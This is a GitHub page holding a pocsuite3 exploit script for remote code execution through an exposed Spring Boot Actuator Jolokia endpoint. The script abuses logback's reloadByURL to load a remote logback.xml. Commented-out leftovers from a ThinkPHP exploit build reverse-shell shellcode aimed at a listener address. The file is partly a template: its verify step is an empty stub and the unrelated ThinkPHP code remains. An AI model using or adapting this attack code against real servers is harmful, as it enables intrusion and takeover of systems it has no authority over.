-
Notifications
You must be signed in to change notification settings - Fork 0
/
spring_boot_jolokia_1_4_rce.py
101 lines (89 loc) · 3.66 KB
/
spring_boot_jolokia_1_4_rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, get_listener_ip, get_listener_port, \
VUL_TYPE
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.utils import random_str, generate_shellcode_list
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import REVERSE_PAYLOAD
class DemoPOC(POCBase):
vulID = '0' # ssvid
version = '1.0'
author = ['funny']
vulDate = '2019-12-7'
createDate = '2019-12-7'
name = 'Spring boot Actuator jolokia 远程代码执行漏洞'
appPowerLink = 'http://www.jolokia.org/'
appName = 'Spring boot Actuator jolokia'
appVersion = 'spring boot1.4该配置默认开启,1.5版本之后默认关闭'
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''Spring Boot Acuator 可以帮助你监控和管理Spring Boot应用,jolokia 是一个实现JMX的开源项目,
但是在spring boot中,利用jolokia配置不当可以实现远程命令执行'''
samples = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
# def _check(self, url):
# flag = 'PHP Extension Build'
# data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
#
# payloads = [
# r"/index.php?s=captcha"
# ]
# for payload in payloads:
# vul_url = url + payload
# headers = {
# "Content-Type": "application/x-www-form-urlencoded"
# }
# r = requests.post(vul_url, data=data, headers=headers)
#
# if flag in r.text:
# return payload, data
# return False
def _verify(self):
result = {}
# p = self._check(self.url)
# if p:
# result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = p[0]
# result['VerifyInfo']['Postdata'] = p[1]
return self.parse_output(result)
def _attack(self):
result = {}
payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
vul_url = self.url + payload
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
logger.info("url: {}".format(vul_url))
r = requests.get(vul_url, headers=headers)
if r.status_code == 200:
result['ShellInfo'] = {}
result['ShellInfo']['Content'] = r.text
return self.parse_output(result)
# def _shell(self):
# vulurl = self.url + "/index.php?s=captcha"
# # 生成写入文件的shellcode
# _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(),
# os_target=OS.WINDOWS,
# os_target_arch=OS_ARCH.X64)
# for i in _list:
# data = {
# '_method': '__construct',
# 'filter[]': 'system',
# 'method': 'get',
# 'server[REQUEST_METHOD]': i
# }
# headers = {
# "Content-Type": "application/x-www-form-urlencoded"
# }
# requests.post(vulurl, data=data, headers=headers)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)